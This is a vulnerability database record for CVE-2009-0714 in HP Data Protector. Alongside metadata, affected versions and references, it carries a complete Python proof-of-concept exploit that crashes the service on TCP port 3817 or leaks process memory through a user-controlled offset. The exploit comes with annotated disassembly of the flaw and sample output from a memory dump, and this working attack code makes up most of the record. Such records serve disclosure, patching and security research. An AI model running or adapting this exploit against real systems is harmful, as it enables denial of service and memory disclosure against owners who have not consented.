ID
VAR-E-200905-0328
CVE
| cve_id: | CVE-2009-0714 | Trust: 2.4 |
EDB ID
9006
TITLE
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service. CVE-2009-0714CVE-54509 . dos exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | hp | model: | data protector 4.00-sp1b43064 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | hp | model: | data protector 4.00-sp1 | scope: | eq | version: | 43064 | Trust: 0.5 |
| vendor: | hp | model: | data protector express sse | scope: | eq | version: | 4.x | Trust: 0.3 |
| vendor: | hp | model: | data protector express sse | scope: | eq | version: | 3.x | Trust: 0.3 |
| vendor: | hp | model: | data protector express | scope: | eq | version: | 4.x | Trust: 0.3 |
| vendor: | hp | model: | data protector express | scope: | eq | version: | 3.x | Trust: 0.3 |
EXPLOIT
#!/usr/bin/env python
#POC Memory disclosure/ Denial Of Service
#HP Data protector 4.00-sp1 43064
#Tested for Windows Version Only
'''
Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80
100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754]
100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598]
100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data
100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset
100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak
100DDEA3 83C4 1C ADD ESP,1C
100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI
'''
import socket
import sys
import struct
import time
import getopt
bf = ("\x54\x84\x00\x00" +
"\x00\x00\x00\x00" +
"\x06\x00\x00\x00" +
"\x92\x00\x00\x00" +
"data")
ip = '192.168.0.14'
port = 3817
addr = (ip,port)
mem_addr = 0x7ffdf000 #PEB for windows
DEBUG = False
def exploit_memory(ip_addr,read_mem):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip_addr,port))
reqst = bf.replace("data","A"*130)
#t = ((addr-1022AC80)/4 - 4)
t = ((read_mem-0x1022A4F0)/4 - 4)
print "0x%x" % t
reqst = reqst[0:32] + struct.pack("<L",t) + reqst[36:]
s.send(reqst)
resp = s.recv(1000)
leak = struct.unpack("<L",resp[32:36])
#print type(leak[0])
if DEBUG:
print "Len of resp: %d" % len(resp)
for i in range(0,len(resp)):
if i % 16 ==0:
print
print "0x%02x" % struct.unpack("<B",resp[i]),
print
s.close()
return leak[0]
def dos_yosemite(ip_addr):
print "[*] Sending DOS Exploit."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip_addr,port))
reqst = bf.replace("data","A"*130)
s.send(reqst)
#resp = s.recv(1000)
s.close()
def main():
try:
opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="])
if len(opt)==0:
usage()
sys.exit(0)
except getopt.GetoptError,err:
print str(err)
usage()
sys.exit(2)
for o,a in opt:
if o in ("-h","--help"):
usage()
sys.exit()
elif o in ("-e","--exploit"):
for opt_target,arg_target in opt:
if opt_target in ("-t","--target"):
if int(a) == 0: # DoS
dos_yosemite(arg_target)
sys.exit(0)
elif int(a) == 1:
print "[*] Dumping Memory..{PEB}"
for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory
leak = exploit_memory(arg_target,mem_addr+i)
time.sleep(0.5)
print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak)
sys.exit()
else:
print "[*] Unknown Exploit type"
usage()
sys.exit()
else:
print "[*] Target Missing"
usage()
sys.exit()
else:
continue
def usage():
print "Yosemite DoS and Information Disclosure Exploit"
#print "Yosemite backup standard v8.7 build 43905 Trial"
#print "Tested for Windows Versions"
print "Available Options"
print "\t -t | --target target address"
print "\t -e | --exploit { 0 - Dos \ 1 - Memory Leak }"
print "\n"
if __name__=='__main__':
main()
'''
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1
[*] Dumping Memory..{PEB}
0x7ffdf000 ---> 0x0012fbc4
0x7ffdf004 ---> 0x00130000
0x7ffdf008 ---> 0x0012d000
0x7ffdf00c ---> 0x00000000
0x7ffdf010 ---> 0x00001e00
0x7ffdf014 ---> 0x00000000
0x7ffdf018 ---> 0x7ffdf000
0x7ffdf01c ---> 0x00000000
0x7ffdf020 ---> 0x00000c54
0x7ffdf024 ---> 0x00000cfc
0x7ffdf028 ---> 0x00000000
0x7ffdf02c ---> 0x00000000
0x7ffdf030 ---> 0x7ffdb000
0x7ffdf034 ---> 0x00000000
0x7ffdf038 ---> 0x00000000
0x7ffdf03c ---> 0x00000000
0x7ffdf040 ---> 0xe15b42a0
0x7ffdf044 ---> 0x00000000
0x7ffdf048 ---> 0x00000000
0x7ffdf04c ---> 0x00000000
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0
[*] Sending DOS Exploit.
'''
# milw0rm.com [2009-06-23]
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Memory Leak/Denial of Service
Trust: 1.0
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
| tag: | memory leak | Trust: 0.5 |
CREDITS
Nibin
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2009-0714 | Trust: 2.4 |
| db: | EXPLOIT-DB | id: | 9006 | Trust: 1.6 |
| db: | EDBNET | id: | 33199 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 78610 | Trust: 0.5 |
| db: | BID | id: | 34955 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2009-0714 | Trust: 2.1 |
| url: | https://www.exploit-db.com/exploits/9006/ | Trust: 0.6 |
| url: | http://ivizsecurity.com/security-advisory-iviz-sr-09002.html | Trust: 0.3 |
| url: | http://h18000.www1.hp.com/products/storage/software/datapexp/specs.html | Trust: 0.3 |
| url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01697543 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 34955 |
| db: | PACKETSTORM | id: | 78610 |
| db: | EXPLOIT-DB | id: | 9006 |
| db: | EDBNET | id: | 33199 |
LAST UPDATE DATE
2022-07-27T09:16:46.974000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 34955 | date: | 2009-11-25T20:25:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 34955 | date: | 2009-05-13T00:00:00 |
| db: | PACKETSTORM | id: | 78610 | date: | 2009-06-24T00:17:14 |
| db: | EXPLOIT-DB | id: | 9006 | date: | 2009-06-23T00:00:00 |
| db: | EDBNET | id: | 33199 | date: | 2009-06-23T00:00:00 |